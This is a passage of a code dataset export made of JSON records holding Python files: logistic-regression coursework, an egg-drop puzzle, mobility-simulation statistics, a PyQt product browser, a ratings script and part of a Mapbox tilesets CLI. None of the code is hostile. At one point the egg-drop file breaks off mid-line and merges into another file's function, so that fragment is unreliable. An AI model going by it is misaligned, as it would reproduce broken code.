return 1 if h >= 0.5 else 0\n \n def gradient_descent(self, X, y):\n self.cost_history = []\n self.weights = np.zeros(X.shape[1])\n cur_loss = self.cost_func(X, y)\n\n cur_step = 0\n while cur_step < self.max_steps:\n cur_step += 1\n self.gradient_descent_step(X, y)\n new_loss = self.cost_func(X, y)\n self.cost_history.append(new_loss)\n if abs(new_loss - cur_loss) < self.THRESHOLD:\n break\n\n cur_loss = new_loss\n \n def gradient_descent_step(self, X, y):\n gradient = self.cost_der(X, y, self.weights)\n gradient *= self.learning_rate\n self.weights -= gradient\n \n def cost_func_non_regularized(self, X, y, weights=None):\n if weights is None:\n weights = self.weights\n \n predictions = self.calculate_hypotesis(X, weights)\n cost_trues = y * np.log(predictions)\n cost_falses = (1 - y) * np.log(1 - predictions)\n total_cost = -np.mean(cost_trues + cost_falses)\n return total_cost\n \n def cost_func_regularized(self, X, y, weights=None):\n if weights is None:\n weights = self.weights\n \n cost = self.cost_func_non_regularized(X, y, weights)\n weights_R = weights[1:]\n total_cost = cost + (self.reg_L / 2 / X.shape[0]) * np.dot(weights_R.T, weights_R)\n return total_cost\n \n def calculate_hypotesis(self, X, weights=None):\n if weights is None:\n weights = self.weights\n\n return sigmoid(X.dot(weights))\n \n def cost_der_non_regularized(self, X, y, theta):\n predictions = self.calculate_hypotesis(X, weights=theta)\n sq_error = predictions - y\n gradient = np.dot(X.T, sq_error)\n gradient /= X.shape[0]\n return gradient\n\n def cost_der_regularized(self, X, y, theta):\n predictions = self.calculate_hypotesis(X, weights=theta)\n sq_error 
= predictions - y\n gradient_first = np.dot(X.T[:1], sq_error)\n gradient_full = np.dot(X.T[1:], sq_error) + self.reg_L * theta[1:]\n gradient = np.insert(gradient_full, 0, gradient_first)\n gradient /= X.shape[0]\n return gradient\n \n def nelder_mead_algo(self, X, y):\n from scipy.optimize import fmin\n\n N = X.shape[0]\n\n def func(theta):\n return self.cost_func(X, y, theta)\n \n init_theta = np.zeros(X.shape[1])\n self.weights = fmin(func, init_theta, xtol=self.THRESHOLD, maxfun=100000)\n \n def bfgs_algo(self, X, y):\n from scipy.optimize import fmin_bfgs\n\n N = X.shape[0]\n\n def func(theta):\n return self.cost_func(X, y, theta)\n \n def func_der(theta):\n return self.cost_der(X, y, theta)\n\n init_theta = np.zeros(X.shape[1])\n self.weights = fmin_bfgs(func, init_theta, fprime=func_der, gtol=self.THRESHOLD, disp=self.log)\n \n\ncls_grad = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.004)\ncls_grad.fit(X_train, y_train)\nprint(f'Minimum cost function value: {cls_grad.cost_history[-1]}')\nprint(f'Iterations: {len(cls_grad.cost_history)}')\nprint(f'Weights: {cls_grad.weights}')\n\ncls_nm = LogisticRegression(fit_method='nelder_mead_algo')\ncls_nm.fit(X_train, y_train)\nprint(f'Weights: {cls_nm.weights}')\n\ncls_bfgs = LogisticRegression(fit_method='bfgs_algo', log=True)\ncls_bfgs.fit(X_train, y_train)\nprint(f'Weights: {cls_bfgs.weights}')\n\n\nz_true = df[df['accepted'] == 1]\nz_false = df[df['accepted'] == 0]\n\ndef decision_boundary(x, weights):\n return -(weights[0] + weights[1] * x) / weights[2]\n\nfig, ax = plt.subplots()\nax.scatter(z_true['first_exam'], z_true['second_exam'], marker='o', c='g', label='Accepted', s=20)\nax.scatter(z_false['first_exam'], z_false['second_exam'], marker='x', c='r', label='Not accepted', s=20)\nax.plot(z_false['first_exam'],\n [decision_boundary(i, cls_grad.weights) for i in z_false['first_exam']],\n c='b', label='Decision boundary')\nax.legend(loc='upper right');\nax.set_xlabel('First exam')\nax.set_ylabel('Second exam')\nplt.show()\n\n\ndf = load_file('ex2data2.txt', names=['first_test', 'second_test', 'passed'])\nX_train, y_train = df.filter(['first_test', 'second_test']), df['passed']\n\n\nz_true = df[df['passed'] == 1]\nz_false = df[df['passed'] == 0]\nfig, ax_reg = plt.subplots()\nax_reg.scatter(z_true['first_test'], z_true['second_test'], marker='o', c='g', label='Passed', s=20)\nax_reg.scatter(z_false['first_test'], z_false['second_test'], marker='x', c='r', label='Not passed', s=20)\nax_reg.legend(loc='upper right');\nax_reg.set_xlabel('First test')\nax_reg.set_ylabel('Second test')\nplt.show()\n\n\ndef build_poly_features(x1, x2, log=False):\n degree = 6\n res = []\n str_res = []\n\n for i in range(degree + 1):\n for j in range(i, degree + 1):\n res.append(x1**(j - i) * x2**i)\n first = '' if j - i == 0 else 'x1' if j - i == 1 else f'x1^{j - i}'\n second = '' if i == 0 else 'x2' if i == 1 else f'x2^{i}'\n if not first and not second:\n str_append = '1'\n elif first and not second:\n str_append = first\n elif second and not first:\n str_append = second\n else:\n str_append = f\"{first}*{second}\"\n str_res.append(str_append)\n\n str_res = ' + '.join(str_res)\n if log:\n print(str_res)\n assert len(res) == 28\n return np.array(res).T\n\n\nX_poly = build_poly_features(X_train['first_test'], X_train['second_test'], log=True)\n\ncls_grad_reg = LogisticRegression(fit_method='gradient_descent', regularized=True,\n max_steps=300000, learning_rate=0.5, reg_L=0.5)\ncls_grad_reg.fit(X_poly, 
y_train)\nprint(f'Minimum cost function value: {cls_grad_reg.cost_history[-1]}')\nprint(f'Iterations: {len(cls_grad_reg.cost_history)}')\nprint(f'Weights: {cls_grad_reg.weights}')\n\ncls_nm_reg = LogisticRegression(fit_method='nelder_mead_algo', regularized=True)\ncls_nm_reg.fit(X_poly, y_train)\nprint(f'Weights: {cls_nm_reg.weights}')\n\ncls_bfgs_reg = LogisticRegression(fit_method='bfgs_algo', regularized=True, log=True)\ncls_bfgs_reg.fit(X_poly, y_train)\nprint(f'Weights: {cls_bfgs_reg.weights}')\n\n\nprint(f\"Predicted class: {cls_grad_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\nprint(f\"Predicted class: {cls_nm_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\nprint(f\"Predicted class: {cls_bfgs_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\n\n\ndef decision_boundary_contour(theta1, theta2, theta3):\n u = np.linspace(-1, 1.2, 50)\n v = np.linspace(-1, 1.3, 50)\n z1 = np.zeros(shape=(len(u), len(v)))\n z2 = np.zeros(shape=(len(u), len(v)))\n z3 = np.zeros(shape=(len(u), len(v)))\n for i in range(len(u)):\n for j in range(len(v)):\n z1[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta1)\n z2[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta2)\n z3[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta3)\n\n z1 = z1.T\n z2 = z2.T\n z3 = z3.T\n fig, ax_reg = plt.subplots()\n ax_reg.contour(u, v, z1, levels=0, colors='b')\n ax_reg.contour(u, v, z2, levels=0, colors='g')\n ax_reg.contour(u, v, z3, levels=0, colors='y')\n z_true = df[df['passed'] == 1]\n z_false = df[df['passed'] == 0]\n ax_reg.scatter(z_true['first_test'], z_true['second_test'], marker='o', c='g', label='Passed', s=20)\n ax_reg.scatter(z_false['first_test'], z_false['second_test'], marker='x', c='r', label='Not passed', s=20)\n ax_reg.legend(loc='upper right');\n ax_reg.set_xlabel('First test')\n ax_reg.set_ylabel('Second test')\n ax_reg.set_title('Decision boundary, lambda = %f' % cls_grad_reg.reg_L)\n plt.show()\n \ndecision_boundary_contour(cls_grad_reg.weights, cls_nm_reg.weights, cls_bfgs_reg.weights)\n\n\ncls1 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.5)\ncls1.fit(X_poly, y_train)\n\ncls2 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.05)\ncls2.fit(X_poly, y_train)\n\ncls3 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.005)\ncls3.fit(X_poly, y_train)\n\ndecision_boundary_contour(cls1.weights, cls2.weights, cls3.weights)\n\n\nfrom scipy.io import loadmat\n\nmat = loadmat('ex2data3.mat')\nX_train, y_train = mat['X'], mat['y']\ny_train = y_train.reshape(y_train.shape[0])\ny_train = np.where(y_train != 10, y_train, 0)\n\n\ndef vector_to_matrix(x):\n len_vec = len(x)\n step = int(np.sqrt(len_vec))\n assert step ** 2 == len_vec, 'Matrix should be squared' \n matrix = [x[left:left+step] for left in range(0, len_vec, step)]\n np_matrix = np.array(matrix).T\n reversed_matrix = np.flip(np_matrix, axis=0)\n return reversed_matrix\n\nnums = list(range(150, 5000, 500))\npictures = [vector_to_matrix(X_train[i]) for i in nums]\n\nfig, axs = plt.subplots(2, 5, figsize=(20, 8))\nfor i, ax in enumerate(axs.flatten()):\n ax.pcolor(pictures[i], cmap=cm.gray)\n res = y_train[nums[i]]\n if res == 10:\n res = 0\n ax.set_title(f'Number {res}')\n\nplt.show()\n\n\nclass MulticlassLogisticRegression:\n classifier = LogisticRegression\n\n def 
__init__(self, num_classes=10):\n self.num_classes = num_classes\n self.classifiers = [\n self.classifier(fit_method='gradient_descent', learning_rate=0.5, regularized=True, reg_L=0.1)\n for i in range(num_classes)\n ]\n \n def fit(self, X, y):\n for i in range(self.num_classes):\n y_train = (y == i).astype(int)\n self.classifiers[i].fit(X, y_train)\n \n def predict(self, X):\n h = []\n for cls in self.classifiers:\n h.append(cls.calculate_hypotesis(X))\n \n return np.argmax(np.array(h), axis=0)\n \n \ncls_mult = MulticlassLogisticRegression()\ncls_mult.fit(X_train, y_train)\npred_value = cls_mult.predict(X_train[-1])\nprint(f\"Predicted class: {pred_value}, actual class: {y_train[-1]}\")\n\n\ndef accuracy(cls, X, y):\n error = cls.predict(X) - y\n return 1.0 - (float(np.count_nonzero(error)) / len(error))\n\nacc = accuracy(cls_mult, X_train, y_train)\nprint(f\"Accuracy: {acc}\")\n","sub_path":"lab2/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":12513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"454372841","text":"import sys\r\ndef check(egg,count):\r\n if egg==0:return 0\r\n else:\r\n total=0\r\n for i in range(count):total+=check(egg-1,i)+1\r\n return total\r\ndef crack_egg(egg,floor,count=0):\r\n while check(egg,count) 0:\n t = 0\n unique = set()\n for c in contacts_j:\n t += c.duration\n unique.add(c.indiv_i)\n\n counts.append(len(contacts_j))\n counts_unique.append(len(unique))\n total_contact_time.append(t)\n ave_contact_time.append(t / len(contacts_j))\n ave_contact_time_unique.append(t / len(unique))\n\n else:\n empty += 1\n\n print('empty = ', empty)\n\n return dict(\n counts=counts,\n counts_unique=counts_unique,\n total_contact_time=total_contact_time,\n ave_contact_time=ave_contact_time,\n ave_contact_time_unique=ave_contact_time_unique,\n )\n\n\ndef comp_stats(arr0, arr1):\n return {\n 'mean': np.mean(arr0) / np.mean(arr1),\n 'median': np.median(arr0) / np.median(arr1),\n 'max': np.max(arr0) / np.max(arr1),\n }\n\n\ndef compute_mob_statistics(loc_tup, days, max_people, verbose=False):\n '''Computes all MobilitySimulator statistics for given `country` and `area` '''\n\n country, area = loc_tup\n\n if verbose:\n print(country, area)\n\n # get mobility simulator settings\n statistics = dict()\n mob_settings_downsampled, mob_settings_full = calibration_mob_paths[country][area]\n\n # downsampled\n with open(mob_settings_downsampled, 'rb') as fp:\n obj = pickle.load(fp)\n mob_downsampled = MobilitySimulator(**obj)\n mob_downsampled.verbose = verbose\n mob_downsampled.simulate(max_time=days * TO_HOURS, lazy_contacts=True)\n\n # full\n with open(mob_settings_full, 'rb') as fp:\n obj = pickle.load(fp)\n mob_full = MobilitySimulator(**obj)\n mob_full.verbose = verbose\n mob_full.simulate(max_time=days * TO_HOURS, lazy_contacts=True)\n\n # compute contact information\n contact_info_downsampled = get_stats(\n mob_downsampled, max_people, verbose=verbose)\n del mob_downsampled\n contact_info_full = get_stats(mob_full, max_people, verbose=verbose)\n del mob_full\n\n # summarize\n for s in contact_info_downsampled.keys():\n\n fig = plt.figure(figsize=(4, 7))\n ax0 = fig.add_subplot(211)\n ax0.hist(contact_info_downsampled[s])\n ax0.set_title('downsampled')\n xlim0 = ax0.get_xlim()\n ax1 = fig.add_subplot(212)\n ax1.hist(contact_info_full[s])\n ax1.set_title('full')\n xlim1 = ax1.get_xlim()\n\n ax0.set_xlim((min(xlim0[0], xlim1[0]), max(xlim0[1], xlim1[1])))\n ax1.set_xlim((min(xlim0[0], xlim1[0]), max(xlim0[1], xlim1[1])))\n fig.suptitle(s)\n plt.savefig('plots/betaScaling-' + loc_tup[0] + '-' + loc_tup[1] + '-' + s + '.png', format='png', facecolor=None,\n dpi=200, bbox_inches='tight')\n plt.close('all')\n\n d = comp_stats(\n contact_info_downsampled[s],\n contact_info_full[s])\n for k, v in d.items():\n statistics['ratio-' + k + '-' + s] = v\n\n # print always\n print(country, area)\n pprint(statistics)\n\n return statistics\n\n\nif __name__ == '__main__':\n\n days = 7.0\n max_people = 5000\n parallel = False\n cpu_count = 2\n\n locs = [\n ('GER', 'TU'), ('GER', 'KL'), ('GER', 'RH'), ('GER', 'TR'),\n ('CH', 'VD'), ('CH', 'BE'), ('CH', 'TI'), ('CH', 'JU'),\n ]\n\n # run in parallel for all locs\n if parallel:\n with ProcessPoolExecutor(cpu_count) as ex:\n res = ex.map(\n compute_mob_statistics,\n locs,\n [days for _ in locs],\n [max_people for _ in locs]\n )\n else:\n res = [compute_mob_statistics(\n tup, days, max_people, verbose=True) for tup in locs]\n\n # print all statistics\n all_statistics_unordered = dict(zip(locs, res))\n\n pprint(all_statistics_unordered)\n\n 
all_statistics = dict()\n\n for s in res[0].keys():\n all_statistics[s] = dict()\n for loc_tup in locs:\n all_statistics[s][loc_tup] = all_statistics_unordered[loc_tup][s]\n\n print('\\nStatistics by type:')\n pprint(all_statistics)\n","sub_path":"sim/betaScaling.py","file_name":"betaScaling.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"256013927","text":"import pyaudio\r\nimport wave\r\nimport sys\r\nCHUNK=1024\r\ndef talk(op=''):\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(op.getsampwidth()),\r\n channels=op.getnchannels(),\r\n rate=op.getframerate(),\r\n output=True)\r\n\r\n data = op.readframes(CHUNK)\r\n\r\n while len(data) > 0:\r\n stream.write(data)\r\n data = op.readframes(CHUNK)\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()\r\ndef numeros():\r\n import math\r\n unidad=[\" \",\"n1\",\"n2\",\"n3\",\"n4\",\"n5\",\"n6\",\"n7\",\"n8\",\"n9\",\"n10\"]\r\n esp=[\" \",\"n11\",\"n12\",\"n13\",\"n14\",\"n15\",\"n16\",\"n17\",\"n18\",\"n19\"]\r\n decenas = [\"\",\"n10\",\"n20\", \"n30\",\"n40\",\"n50\", \"n60\",\"n70\", \"n80\", \"n90\"]\r\n centenas = [\"n100\",\"n100.2\",\"n200\",\"n300\",\"n400\",\"n500\",\"n600\",\"n700\",\"n800\",\"n900\"]\r\n \r\n local=\"./nu/\"\r\n print(\"**Suma de numeros Menor de 1000**\")\r\n su1=int(input(\"Digite el primer numero:\"))\r\n su2=int(input(\"Digite el segundo numero:\"))\r\n num=su1+su2\r\n \r\n if (num < 9):\r\n op=wave.open(local+unidad[num]+\".wav\")\r\n talk(op)\r\n elif (num==10):\r\n op=wave.open(local+\"n10.wav\")\r\n talk(op)\r\n elif (num>11 and num<20):\r\n num=num-10\r\n op=wave.open(local+esp[num]+\".wav\")\r\n talk(op)\r\n elif (num >= 20 and num < 100):\r\n u= (num%10)\r\n d=int(num/10)\r\n op=wave.open(local+decenas[d]+\".wav\")\r\n if (u==0):\r\n talk(op)\r\n else:\r\n op1=wave.open(local+\"y.wav\")\r\n op2=wave.open(local+unidad[u]+\".wav\")\r\n [talk(op),talk(op1),talk(op2)]\r\n elif (num >=100 and num <=1000):\r\n if(num==1000):\r\n op=wave.open(local+\"n1000.wav\")\r\n talk(op)\r\n elif(num<1000):\r\n c=int(num/100)\r\n d=int((num-(c*100))/10)\r\n u=int(num-(c*100+d*10))\r\n if(u==0):\r\n if(d==0):\r\n op=wave.open(local+centenas[0]+\".wav\")\r\n talk(op)\r\n else:\r\n op1=wave.open(local+centenas[c]+\".wav\")\r\n op2=wave.open(local+decenas[d]+\".wav\")\r\n [talk(op1),talk(op2)]\r\n else:\r\n if(d == 1) and (u == 1,2,3,4,5,6,7,8,9):\r\n\r\n op=wave.open(local+centenas[c]+\".wav\")\r\n op1=wave.open(local+esp[u]+\".wav\")\r\n [talk(op),talk(op1)]\r\n else:\r\n op=wave.open(local+centenas[c]+\".wav\")\r\n op1=wave.open(local+decenas[d]+\".wav\")\r\n op2=wave.open(local+\"y.wav\")\r\n op3=wave.open(local+unidad[u]+\".wav\")\r\n [talk(op),talk(op1),talk(op2),talk(op3)]\r\n\r\nnumeros()\r\n\r\n\r\n\r\n \r\n","sub_path":"facial recognition/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"141520706","text":"from pychrom.modeling.cadet_modeler import CadetModeler\nfrom pychrom.core import *\nfrom pychrom.opt.casadi.build_utils import *\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\ncomps = ['A',\n 'B',\n 'C',\n 'D']\n\nGRM = GRModel(components=comps)\n\n# create sections\nGRM.load = Section(components=comps)\nfor cname in comps:\n GRM.load.set_a0(cname, 1.0)\n\nGRM.load.set_a0('A', 50.0)\nGRM.load.set_a1('A', 0.0)\nGRM.load.start_time_sec = 0.0\n\nGRM.wash = Section(components=comps)\nGRM.wash.set_a0('A', 50.0)\nGRM.wash.start_time_sec = 10.0\n\nGRM.elute = Section(components=comps)\nGRM.elute.set_a0('A', 100.0)\nGRM.elute.set_a1('A', 0.2)\nGRM.elute.start_time_sec = 90.0\n\n# create inlet\nGRM.inlet = Inlet(components=comps)\nGRM.inlet.add_section('load')\nGRM.inlet.add_section('wash')\nGRM.inlet.add_section('elute')\n\n# create binding\nGRM.salt = 'A'\nGRM.binding = SMABinding(data=\"sma.yml\")\nGRM.binding.is_kinetic = True\n\n# create column\nGRM.column = Column(data=\"column.yml\")\n\n# create outlet\nGRM.outlet = Outlet(components=comps)\n\n# connect units\nGRM.connect_unit_operations('inlet', 'column')\nGRM.connect_unit_operations('column', 'outlet')\n\nfor name in GRM.list_components():\n nu = 1.0\n GRM.column.binding_model.set_nu(name, nu)\n\ncwrapper = CasadiColumn(GRM.column)\nlspan = np.linspace(0, GRM.column.length, 50)\ncwrapper.build_model(lspan, nominal_c={'A': 50}, nominal_q={'A': 1200})\n\n# defines grid of times\ntspan = np.linspace(0, 1500, 1500)\nresults = cwrapper.solve(tspan)\n\nfor cname in results.components:\n if cname !='A':\n to_plot = results.C.sel(component=cname)\n plot2d = to_plot.sel(col_loc=GRM.column.length)\n plt.plot(plot2d.time, plot2d)\nplt.show()\n\n","sub_path":"pychrom/opt/casadi/simulating_sma.py","file_name":"simulating_sma.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"303688508","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtSql import *\n\nfrom view_product_details import *\n\nclass BrowseProductSearchResults(QWidget):\n cancel_button_signal = pyqtSignal()\n\n def __init__(self, search_type, search_name):\n super().__init__()\n \n self.table_view = QTableView()\n self.table_view.setSelectionBehavior(1)\n self.table_view.setEditTriggers(self.table_view.EditTrigger(0))\n self.cancel_button = QPushButton(\"Close\")\n self.information_label = QLabel('To view information about a product, click on the product and click \"View iformation\"')\n self.view_button = QPushButton(\"View information\")\n\n self.information_label.setAlignment(Qt.Alignment(4))\n\n self.layout = QVBoxLayout()\n self.layout.addWidget(self.information_label)\n self.layout.addWidget(self.table_view)\n self.layout.addWidget(self.cancel_button)\n self.layout.addWidget(self.view_button)\n\n self.setLayout(self.layout)\n\n self.create_table_model(search_type, search_name)\n\n #Connection\n self.cancel_button.clicked.connect(self.cancel_button_clicked)\n self.view_button.clicked.connect(self.view_button_clicked)\n\n def create_table_model(self, search_type, search_name):\n self.model = QSqlTableModel()\n query = QSqlQuery()\n if search_type == \"product_type_ID\":\n query.prepare(\"\"\"SELECT * FROM Product WHERE ProductTypeID = ?\"\"\")\n query.addBindValue(search_name)\n query.exec_()\n elif search_type == \"kit_name\" or \"blank_name\":\n query.prepare(\"\"\"SELECT PartID FROM Part WHERE PartName = ?\"\"\")\n query.addBindValue(search_name)\n query.exec_()\n while query.next():\n id_number = query.value(0)\n query.prepare(\"\"\"SELECT * FROM ProductParts WHERE PartID = ?\"\"\")\n query.addBindValue(id_number)\n query.exec_()\n self.model.setQuery(query)\n self.model.setEditStrategy(QSqlTableModel.OnManualSubmit)\n self.table_view.setModel(self.model)\n self.table_view.model().select()\n\n def product(self):\n self.index = self.table_view.selectedIndexes()\n self.product_id = self.table_view.model().data(self.index[0])\n query = QSqlQuery()\n query.prepare(\"\"\"SELECT Price, ProductTypeID, Quantity, ProductStatus FROM Product WHERE ProductID = ?\"\"\")\n query.addBindValue(self.product_id)\n query.exec_()\n while query.next():\n self.product_price = query.value(0)\n self.product_type_id = query.value(1)\n self.product_quantity = query.value(2)\n self.product_status = query.value(3)\n self.part_id = []\n query.prepare(\"\"\"SELECT PartID FROM ProductParts WHERE ProductID = ?\"\"\")\n query.addBindValue(self.product_id)\n query.exec_()\n while query.next():\n self.part_id.append(query.value(0))\n self.kit_id = self.part_id[0]\n self.blank_id = self.part_id[1]\n query.prepare(\"\"\"SELECT ProductType FROM ProductType WHERE ProductTypeID = ?\"\"\")\n query.addBindValue(self.product_type_id)\n query.exec_()\n while query.next():\n self.product_type = query.value(0)\n query.prepare(\"\"\"SELECT PartName FROM Part WHERE PartID = ?\"\"\")\n query.addBindValue(self.kit_id)\n query.exec_()\n while query.next():\n self.kit_name = query.value(0)\n query.prepare(\"\"\"SELECT PartName FROM Part WHERE PartID = ?\"\"\")\n query.addBindValue(self.blank_id)\n query.exec_()\n while query.next():\n self.blank_name = query.value(0)\n details = {\"product id\":self.product_id,\n \"product type\":self.product_type,\n \"price\":self.product_price,\n \"kit_name\":self.kit_name,\n \"blank_name\":self.blank_name,\n \"quantity\":self.product_quantity,\n 
\"status\":self.product_status}\n return details\n\n def view_button_clicked(self):\n details = self.product()\n dialog = ViewProductDetails(details)\n dialog.exec_()\n\n def cancel_button_clicked(self):\n self.cancel_button_signal.emit()\n","sub_path":"browse_product_search_results.py","file_name":"browse_product_search_results.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"65339408","text":"def process_scores():\n scores_txt = open(\"scores.txt\", \"r\")\n scores = {}\n for line in scores_txt:\n line = line.rstrip()\n restaurant, score = line.split(\":\")\n scores[restaurant] = int(score)\n\n return scores\n\n\ndef add_restaurant(scores):\n \n\n print(\"Please add a rating for your favorite restaurant!\")\n restaurant = input(\"Restaurant name> \")\n rating = int(input(\"Rating> \"))\n\n scores[restaurant] = rating\n\n\ndef print_sorted_scores(scores):\n \n\n for restaurant, rating in sorted(scores.items()):\n print(\"{restaurant} is rated at {rating}.\")\nscores = process_scores()\nadd_restaurant(scores)\nprint_sorted_scores(scores)\n","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"530766637","text":"\"\"\"Tilesets command line interface\"\"\"\nimport os\nimport json\nimport requests\nimport tempfile\n\nimport click\nimport cligj\nfrom requests_toolbelt import MultipartEncoder\n\nimport mapbox_tilesets\nfrom mapbox_tilesets import utils, errors\n\n\ndef _get_token(token=None):\n \"\"\"Get Mapbox access token from arg or environment\"\"\"\n if token is not None:\n return token\n else:\n return os.environ.get(\"MAPBOX_ACCESS_TOKEN\") or os.environ.get(\n \"MapboxAccessToken\"\n )\n\n\ndef _get_api():\n \"\"\"Get Mapbox tileset API base URL from environment\"\"\"\n return os.environ.get(\"MAPBOX_API\", \"https://api.mapbox.com\")\n\n\n@click.version_option(version=mapbox_tilesets.__version__, message=\"%(version)s\")\n@click.group()\ndef cli():\n \"\"\"This is the command line interface for the Mapbox Tilesets API.\n Thanks for joining us.\n\n This CLI requires a Mapbox access token. You can either set it in your environment as\n \"MAPBOX_ACCESS_TOKEN\" or \"MapboxAccessToken\" or pass it to each command with the --token flag.\n \"\"\"\n\n\n@cli.command(\"create\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\n \"--recipe\",\n \"-r\",\n required=True,\n type=click.Path(exists=True),\n help=\"path to a Recipe JSON document\",\n)\n@click.option(\"--name\", \"-n\", required=True, type=str, help=\"name of the tileset\")\n@click.option(\n \"--description\", \"-d\", required=False, type=str, help=\"description of the tileset\"\n)\n@click.option(\n \"--privacy\",\n \"-p\",\n required=False,\n type=click.Choice([\"public\", \"private\"]),\n help=\"set the tileset privacy options\",\n)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef create(\n tileset, recipe, name=None, description=None, privacy=None, token=None, indent=None\n):\n \"\"\"Create a new tileset with a recipe.\n\n $ tilesets create \n\n is in the form of username.handle - for example \"mapbox.neat-tileset\".\n The handle may only include \"-\" or \"_\" special characters.\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n body = {}\n body[\"name\"] = name or \"\"\n body[\"description\"] = description or \"\"\n if privacy:\n body[\"private\"] = True if privacy == \"private\" else False\n\n if not utils.validate_tileset_id(tileset):\n raise errors.TilesetNameError\n\n if recipe:\n with open(recipe) as json_recipe:\n body[\"recipe\"] = json.load(json_recipe)\n\n r = requests.post(url, json=body)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"publish\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef publish(tileset, token=None, indent=None):\n \"\"\"Publish your tileset.\n\n tilesets publish \n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/publish?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.post(url)\n if r.status_code == 200:\n click.echo(json.dumps(r.json(), indent=indent))\n click.echo(\n f\"You can view the status of your tileset with the `tilesets status {tileset}` command.\",\n err=True,\n )\n else:\n raise 
errors.TilesetsError(f\"{r.text}\")\n\n\n@cli.command(\"status\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef status(tileset, token=None, indent=None):\n \"\"\"View the current queue/processing/complete status of your tileset.\n\n tilesets status <tileset>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/status?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"jobs\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.option(\"--stage\", \"-s\", required=False, type=str, help=\"job stage\")\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef jobs(tileset, stage, token=None, indent=None):\n \"\"\"View all jobs for a particular tileset.\n\n tilesets jobs <tileset>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/jobs?access_token={2}\".format(\n mapbox_api, tileset, mapbox_token\n )\n if stage:\n url = \"{0}/tilesets/v1/{1}/jobs?stage={2}&access_token={3}\".format(\n mapbox_api, tileset, stage, mapbox_token\n )\n\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"job\")\n@click.argument(\"tileset\", required=True, type=str)\n@click.argument(\"job_id\", required=True, type=str)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef job(tileset, job_id, token=None, indent=None):\n \"\"\"View a single job for a particular tileset.\n\n tilesets job <tileset> <job_id>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = \"{0}/tilesets/v1/{1}/jobs/{2}?access_token={3}\".format(\n mapbox_api, tileset, job_id, mapbox_token\n )\n r = requests.get(url)\n\n click.echo(json.dumps(r.json(), indent=indent))\n\n\n@cli.command(\"list\")\n@click.argument(\"username\", required=True, type=str)\n@click.option(\n \"--verbose\",\n \"-v\",\n required=False,\n is_flag=True,\n help=\"Will print all tileset information\",\n)\n@click.option(\"--token\", \"-t\", required=False, type=str, help=\"Mapbox access token\")\n@click.option(\"--indent\", type=int, default=None, help=\"Indent for JSON output\")\ndef list(username, verbose, token=None, indent=None):\n \"\"\"List all tilesets for an account.\n By default the response is a simple list of tileset IDs.\n If you would like an array of all tilesets' information,\n use the --verbose flag.\n\n tilesets list <username>\n \"\"\"\n mapbox_api = _get_api()\n mapbox_token = _get_token(token)\n url = 